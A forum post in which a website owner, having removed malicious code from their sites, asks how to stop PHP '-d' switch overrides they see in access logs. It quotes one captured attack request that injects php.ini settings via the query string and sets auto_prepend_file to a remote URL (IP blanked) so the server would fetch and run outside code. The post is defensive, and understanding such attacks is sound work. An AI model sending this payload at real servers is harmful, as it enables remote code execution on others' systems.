Jump to content

need assistance with php.ini security issue


Recommended Posts

I have recently cleared malicious code and htaccess files off of a couple of my websites and changed the passwords. Since then I have been watching my access logs and I can see routinely there is someone trying to run commands like this:

"GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F000.000.000.000%2Finfo3.txt

i removed the IP address that was in the link they are trying to use in the auto_prepend_file option because I got a virus when I tried connecting to it from my computer. my question is simply is there an easy way to disable the -d 'switches' they are trying to use to override the php.ini settings? if not, would making a function to run the $_GET array through to check for a pattern match be an effective way of stopping those settings from being used? from what I understand the auto_prepend_file is a file that runs before the page loads. any advice is appreciated.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now

  • Create New...